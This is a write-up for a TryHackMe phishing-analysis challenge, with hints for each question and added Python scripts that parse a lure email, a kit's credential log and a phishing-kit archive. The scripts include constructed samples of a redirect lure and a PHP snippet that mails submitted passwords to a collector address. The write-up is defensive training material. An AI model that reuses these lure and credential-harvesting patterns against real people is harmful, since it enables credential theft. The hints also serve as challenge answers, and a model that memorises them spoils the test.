MBAY-Clement / Snapped-Phish-ing-Line

Writeups Snapped Phish-ing Line Tryhackme


Write-ups "Snapped Phish-ing Line" Tryhackme Chall | https://tryhackme.com/room/snappedphishingline


  1. Who is the individual who received an email attachment containing a PDF?
  • Just open the phish-emails folder and review all the emails :)

  2. What email address was used by the adversary to send the phishing emails?
  • Look at the "From" header of the mail.

  3. What is the redirection URL to the phishing page for the individual Zoe Duncan? (defanged format)
  • Use CyberChef to defang the URL.

You just need to view the source of the .html phishing file to get the redirection URL.

  4. What is the URL to the .zip archive of the phishing kit? (defanged format)
  • Just enumerate the website.

Use CyberChef to defang the URL.
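The steps behind questions 2 to 4 (read the sender address, pull the HTML attachment out of the mail, find the redirect it performs, and defang the URL) can be scripted rather than done by hand. The script below is an added example and is not part of the original write-up or the room: the e-mail is constructed, its addresses and URL are placeholders, and the `defang` helper assumes the `hxxp[://]` and `[.]` notation that CyberChef's "Defang URL" recipe produces with its default options.

```python
import re
from email import message_from_bytes, policy
from email.utils import parseaddr

# Constructed sample e-mail (not from the room). Sender, recipient and the
# redirect URL are placeholders.
SAMPLE_EML = b"""From: "IT Support" <support@example-bad.invalid>
To: user@example.invalid
Subject: Action required: document shared with you
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="B1"

--B1
Content-Type: text/plain; charset="utf-8"

A document has been shared with you, see the attachment.

--B1
Content-Type: text/html; name="document.html"
Content-Disposition: attachment; filename="document.html"
Content-Transfer-Encoding: 7bit

<html><body><p>Loading...</p>
<script>window.location.href="http://phish.example-bad.invalid/login.php?e=user@example.invalid";</script>
</body></html>
--B1--
"""

# The usual ways an HTML lure bounces the victim to the real phishing page.
REDIRECT_PATTERNS = [
    re.compile(r"""(?:\w+\.)?location(?:\.href)?\s*=\s*["']([^"']+)["']""", re.I),
    re.compile(r"""location\.replace\(\s*["']([^"']+)["']""", re.I),
    re.compile(r"""<meta[^>]+http-equiv=["']?refresh["']?[^>]*url=([^"'>\s]+)""", re.I),
]


def defang(url: str) -> str:
    """Defang a URL in the hxxp[://] / [.] style (assumed to match CyberChef's
    'Defang URL' default output) so it cannot be clicked by accident."""
    url = re.sub(r"^(h)tt(ps?)://", r"\1xx\2[://]", url, flags=re.I)
    return url.replace(".", "[.]")


def extract_redirects(html: str) -> list:
    """Return every redirect target found in the HTML, in order of appearance."""
    found = []
    for pat in REDIRECT_PATTERNS:
        for m in pat.finditer(html):
            if m.group(1) not in found:
                found.append(m.group(1))
    return found


def analyse_email(raw: bytes) -> dict:
    """Parse a raw .eml: sender, attachments and redirect URLs of HTML lures."""
    msg = message_from_bytes(raw, policy=policy.default)
    report = {
        "from": str(msg["From"]),
        "sender_address": parseaddr(str(msg["From"]))[1],
        "to": str(msg["To"]),
        "subject": str(msg["Subject"]),
        "attachments": [],
        "redirects": [],
    }
    redirects = []
    for part in msg.iter_attachments():
        ctype = part.get_content_type()
        report["attachments"].append((part.get_filename() or "(unnamed)", ctype))
        if ctype in ("text/html", "text/plain"):
            # get_content() undoes base64 / quoted-printable transfer encoding
            redirects.extend(extract_redirects(part.get_content()))
    report["redirects"] = [{"raw": u, "defanged": defang(u)} for u in redirects]
    return report


if __name__ == "__main__":
    r = analyse_email(SAMPLE_EML)
    print("sender:", r["sender_address"])
    for name, ctype in r["attachments"]:
        print("attachment:", name, ctype)
    for hit in r["redirects"]:
        print("redirect:", hit["defanged"])
```

Reading attachments with `get_content()` matters on real samples: the lure is usually base64-encoded in the mail, and that call decodes it before the regexes run. The defanged form is the one to paste into a write-up or ticket; keep the raw URL out of anything that renders links.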

  5. What is the SHA256 hash of the phishing kit archive?
  • Download the .zip archive, open a terminal and run sha256sum on the file.

  6. When was the phishing kit archive first submitted? (format: YYYY-MM-DD HH:MM:SS UTC)
  • Use the well-known site https://www.virustotal.com, search for the hash of the .zip archive, and look in the right place to get the answer ;)

  7. When was the phishing domain that was used to host the phishing kit archive first registered? (format: YYYY-MM-DD)

  8. What was the email address of the user who submitted their password twice?
  • When you enumerate the website you can see a log.txt file; search through it.
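Searching a kit's log.txt by eye works for a small file; for a larger one it is quicker to parse it and count submissions per address. The script below is an added example, not the room's log or the write-up's own method: the log format and every line in it are constructed for the example, and a real kit may log different fields, so the regex is the part to adapt.

```python
import re
from collections import Counter

# Constructed log lines in the style a phishing kit writes for each submitted
# login form. Addresses, passwords and IPs are invented for this example.
SAMPLE_LOG = """\
2024-01-15 09:12:03 | email: alice@example.invalid | pass: pw-first | ip: 203.0.113.10
2024-01-15 09:12:41 | email: alice@example.invalid | pass: pw-second | ip: 203.0.113.10
2024-01-15 09:30:17 | email: bob@example.invalid | pass: pw-bob | ip: 198.51.100.7
garbage line the kit wrote without the expected fields
2024-01-15 10:02:55 | email: Carol@Example.invalid | pass: pw-carol | ip: 192.0.2.44
2024-01-15 10:03:12 | email: carol@example.invalid | pass: pw-carol | ip: 192.0.2.44
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) \| email: (?P<email>[^|]+?) \| pass: (?P<pw>[^|]*?) \| ip: (?P<ip>\S+)$"
)


def parse_log(text: str):
    """Split the log into records; lines that do not match are returned
    separately instead of being silently dropped."""
    records, bad = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            bad.append((lineno, line))
            continue
        rec = m.groupdict()
        # Mail addresses are case-insensitive in practice; normalise so the
        # same victim is not counted as two people.
        rec["email"] = rec["email"].strip().lower()
        records.append(rec)
    return records, bad


def submissions_per_user(records) -> Counter:
    return Counter(rec["email"] for rec in records)


def repeat_submitters(records):
    """Addresses that submitted the form more than once, most frequent first."""
    counts = submissions_per_user(records)
    return sorted(((e, n) for e, n in counts.items() if n > 1), key=lambda x: (-x[1], x[0]))


def distinct_passwords(records, email: str) -> int:
    """How many different passwords one address submitted. Two different
    values usually mean the first was a typo and the second is the real one."""
    return len({rec["pw"] for rec in records if rec["email"] == email})


if __name__ == "__main__":
    recs, bad = parse_log(SAMPLE_LOG)
    print(f"{len(recs)} records, {len(bad)} unparsed lines")
    for email, n in repeat_submitters(recs):
        print(f"{email}: {n} submissions, {distinct_passwords(recs, email)} distinct passwords")
```

The unparsed-line list is worth printing during an investigation: a kit that logs extra fields for some victims would otherwise hide those entries from the count.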

  9. What was the email address used by the adversary to collect compromised credentials?
  • Open the .zip archive and look for the right file to get the answer (clue: it is in the "Validation" folder, in a .php file).
  10. The adversary used other email addresses in the obtained phishing kit. What is the email address that ends in "@gmail.com"?
  • Unzip the .zip archive and run a simple grep command with -r in this folder.
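Questions 5, 9 and 10 are the same kit-triage routine: hash the archive, find where the PHP sends the stolen credentials, and list every other address the kit mentions. The script below does that in one pass as an added example; it is not the room's kit or the write-up's own code. The archive it builds is constructed in memory with placeholder file names, PHP snippets and addresses, and it reads the kit straight out of the zip instead of extracting it, so nothing from an untrusted archive is written to disk.

```python
import hashlib
import io
import re
import zipfile

# Constructed stand-in for a downloaded phishing-kit archive. File names, PHP
# snippets and e-mail addresses are placeholders invented for this example.
KIT_FILES = {
    "kit/index.php": "<?php header('Location: login.php'); ?>",
    "kit/login.php": "<form method='post' action='Validation/check.php'></form>",
    "kit/Validation/check.php": (
        "<?php\n"
        "$to = 'collector@example-bad.invalid';\n"
        "$body = 'user: ' . $_POST['email'] . ' pass: ' . $_POST['password'];\n"
        "mail($to, 'New login', $body);\n"
        "header('Location: https://portal.example.invalid/');\n"
    ),
    "kit/Validation/config.php": "<?php $backup_recipient = 'kit.backup@gmail.com'; ?>",
    "kit/README.txt": "Support: dev@example.invalid",
}

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# First argument of a PHP mail() call: a string literal or a $variable.
MAIL_CALL_RE = re.compile(r"""\bmail\(\s*(?:'([^']*)'|"([^"]*)"|\$(\w+))""")


def build_kit_zip() -> bytes:
    """Build the sample archive with fixed timestamps so its hash is reproducible."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in KIT_FILES.items():
            info = zipfile.ZipInfo(name, date_time=(2020, 1, 1, 0, 0, 0))
            zf.writestr(info, content)
    return buf.getvalue()


def sha256_hex(data: bytes) -> str:
    """Same value sha256sum prints for the file."""
    return hashlib.sha256(data).hexdigest()


def read_kit(zip_bytes: bytes) -> dict:
    """Map archive path -> text for every file, without extracting to disk."""
    files = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.is_dir():
                files[info.filename] = zf.read(info).decode("utf-8", errors="replace")
    return files


def find_emails(files: dict) -> dict:
    """The grep -r step: every address in the kit and the files it appears in."""
    hits = {}
    for name, text in files.items():
        for addr in EMAIL_RE.findall(text):
            hits.setdefault(addr.lower(), set()).add(name)
    return hits


def exfil_addresses(files: dict) -> set:
    """Recipients of PHP mail() calls, resolving $var to the literal assigned
    earlier in the same file. This is where the stolen credentials go."""
    found = set()
    for name, text in files.items():
        if not name.endswith(".php"):
            continue
        for lit1, lit2, var in MAIL_CALL_RE.findall(text):
            if lit1 or lit2:
                found.add((lit1 or lit2).lower())
            elif var:
                m = re.search(r"\$" + re.escape(var) + r"\s*=\s*['\"]([^'\"]+)['\"]", text)
                if m:
                    found.add(m.group(1).lower())
    return found


def triage_kit(zip_bytes: bytes) -> dict:
    files = read_kit(zip_bytes)
    emails = find_emails(files)
    return {
        "sha256": sha256_hex(zip_bytes),
        "emails": emails,
        "gmail": sorted(a for a in emails if a.endswith("@gmail.com")),
        "exfil": sorted(exfil_addresses(files)),
    }


if __name__ == "__main__":
    report = triage_kit(build_kit_zip())
    print("sha256:", report["sha256"])
    print("exfil recipients:", report["exfil"])
    print("gmail addresses:", report["gmail"])
    for addr, where in sorted(report["emails"].items()):
        print(f"  {addr} in {sorted(where)}")
```

The `exfil_addresses` step is the one worth keeping in your own toolbox: a plain grep lists every address in the kit, but only the recipient of `mail()` tells you where credentials are actually delivered, and kits routinely hide that behind a variable set in a config file.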

  11. What is the hidden flag?
  • When you enumerate the website you find a flag.txt file.

Base64? Yeah, just decode it :)

(; noitcerid thgir eht ni srettel eht tup


Thanks Orzykf and TryHackMe for this fun challenge!
